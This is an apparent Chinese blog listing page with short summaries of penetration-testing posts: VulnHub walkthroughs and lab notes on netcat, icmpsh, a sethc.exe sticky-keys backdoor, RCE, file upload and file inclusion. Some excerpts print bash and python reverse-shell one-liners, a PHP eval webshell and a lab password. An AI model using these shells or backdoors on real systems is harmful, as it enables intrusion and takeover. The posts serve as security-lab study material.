摘要: Moonsec_Projet_7 1、基础介绍 1.1 网络拓扑图 主机 账号 密码 网卡 IP Windows Server 2016 administrator !@#QWE123 vmnet17(web) | vmnet18 192.168.0.144(www.moonlab.com) | 1 阅读全文
posted @ 2024-03-22 10:52 gcc_com 阅读(42) 评论(0) 推荐(0) 编辑
摘要: IPC$管道通信 IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接, 阅读全文
posted @ 2024-03-19 17:11 gcc_com 阅读(51) 评论(0) 推荐(0) 编辑
摘要: Fowsniff 1、nmap 2、web渗透 简单浏览 目录爆破 发现可以文件,下载分析 隐写分析 无果,重新浏览80端口 官网浏览 pastebin.com/378rLnGi信息泄露 制作字典 发现爆破均无果 hash识别 john暴力破解hash 发现爆破一次之后,对方会有限制,一段时间后又可 阅读全文
posted @ 2024-03-18 19:18 gcc_com 阅读(9) 评论(0) 推荐(0) 编辑
摘要: NC(netcat)基本操作 前提: 凭空是无法打开端口,那么我们就可以使用nc这个工具开启我们想要开放的端口。 想开什么端口就可以开什么端口让别人进入。 nc的启用 Windows端nc使用方法 Kali端nc使用方法 基本使用方法一、监听/聊天工具 方法:kali上使用nc去连接Windows7 阅读全文
posted @ 2024-03-17 19:14 gcc_com 阅读(91) 评论(0) 推荐(1) 编辑
摘要: Windows粘滞键后门 原理:把sethc.exe粘滞键功能替换成cmd.exe的shell窗口,连续按5次shift键即可呼出cmd。 ①粘滞键替换成cmd的基本应用 1、找到粘滞键应用所在的位置。 在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应 阅读全文
posted @ 2024-03-13 22:02 gcc_com 阅读(147) 评论(0) 推荐(0) 编辑
摘要: 小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行 阅读全文
posted @ 2024-03-10 20:19 gcc_com 阅读(31) 评论(0) 推荐(0) 编辑
摘要: My_file_server_1(VulnHub) 1、nmap 2、目录爆破 gobuster dirb dirsearch 3、文件服务器渗透 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT: 阅读全文
posted @ 2024-03-06 20:46 gcc_com 阅读(4) 评论(0) 推荐(0) 编辑
摘要: RCE命令执行&代码执行漏洞 RCE命令执行漏洞 RCE漏洞简介 RCE(remote code/command execute) 远程代码/命令执行漏洞 RCE漏洞是两个漏洞: 代码执行漏洞 # 针对后端语言! 命令执行漏洞 # 针对系统! 如何产生 在 Web应用中有时候程序员为了考虑灵活性、简 阅读全文
posted @ 2024-02-27 17:41 gcc_com 阅读(110) 评论(0) 推荐(0) 编辑
摘要: Misdirection(VulnHub) nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subproc 阅读全文
posted @ 2024-02-25 20:40 gcc_com 阅读(8) 评论(0) 推荐(0) 编辑
摘要: Prime 1、nmap 2、web渗透 随便看看 首页隐写查看 目录爆破 gobuster feroxbuster dirsearch dirb 只有dirb扫出来 whatweb searchsploit WordPress 5.2.2 WordPress利用点基本上都是插件或者主题,这里暂时都 阅读全文
posted @ 2024-02-14 16:27 gcc_com 阅读(12) 评论(0) 推荐(0) 编辑
摘要: 42种常见网站漏洞,让你水得快速,水得专业 转载:零漏安全 2024-01-10 12:29 发表于河南 免责声明:由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请 阅读全文
posted @ 2024-02-09 21:54 gcc_com 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 反序列化漏洞 什么是序列化、反序列化 例子引入 序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。 简单的来讲:(含例子easy.php) 序列化:把对象转换为字节序列的过程 阅读全文
posted @ 2024-02-06 09:28 gcc_com 阅读(27) 评论(0) 推荐(0) 编辑
摘要: DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't t 阅读全文
posted @ 2024-02-05 00:16 gcc_com 阅读(8) 评论(0) 推荐(0) 编辑
摘要: hackable II(VulnHub) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 阅读全文
posted @ 2024-02-04 00:05 gcc_com 阅读(8) 评论(0) 推荐(0) 编辑
摘要: Misdirection nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subprocess,os;s= 阅读全文
posted @ 2024-02-03 23:51 gcc_com 阅读(12) 评论(0) 推荐(0) 编辑
摘要: Upload-labs Upload-labs_Pass-01-->绕过前端校验 法一:关闭浏览器js的功能 法二:通过先上传合法的文件后缀,在通过抓包进行文件后缀修改 function checkFile() { var file = document.getElementsByName('upl 阅读全文
posted @ 2024-01-30 00:40 gcc_com 阅读(36) 评论(0) 推荐(0) 编辑
摘要: pikachu通关教程(暴力破解) ①基于表单的暴力破解 不用多说,直接常见用户、弱口令爆破即可。 账号:admin 密码:123456 账号:test 密码:test ②验证码绕过(on client) 提交请求,没有抓到包,说明验证码是前端校验,只要保证能过前端,后面的验证码将不进行校验(把验证 阅读全文
posted @ 2024-01-28 09:20 gcc_com 阅读(74) 评论(0) 推荐(0) 编辑
摘要: 文件包含漏洞 文件包含漏洞简介 文件包含漏洞基础介绍 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控 阅读全文
posted @ 2024-01-27 12:33 gcc_com 阅读(27) 评论(0) 推荐(0) 编辑
摘要: upload-labs-main-v1.0 Pass-01【前端校验】 解题wp (By:独立团孙德胜Alan) 本Pass是客户端过滤,可以通过禁用JS的方式绕过! 1、打开第一关 2、上传一个普通的shell.php文件 <?php @eval($_POST('Alan'));?> 提示不允许上 阅读全文
posted @ 2024-01-26 09:46 gcc_com 阅读(24) 评论(0) 推荐(0) 编辑
摘要: 文件上传漏洞 文件上传漏洞简介 文件上传漏洞出现在有上传功能的应用程序中。如果应用程序对用户的上传文件没有控制或者上传功能存在缺陷,攻击者可以利用应用程序的文件上传漏洞将木马,病毒等有危害的文件上传到服务器上面,控制服务器。 文件上传漏洞产生的主要原因是:应用程序中存在上传功能,但是对上传的文件没有 阅读全文
posted @ 2024-01-25 10:11 gcc_com 阅读(48) 评论(0) 推荐(0) 编辑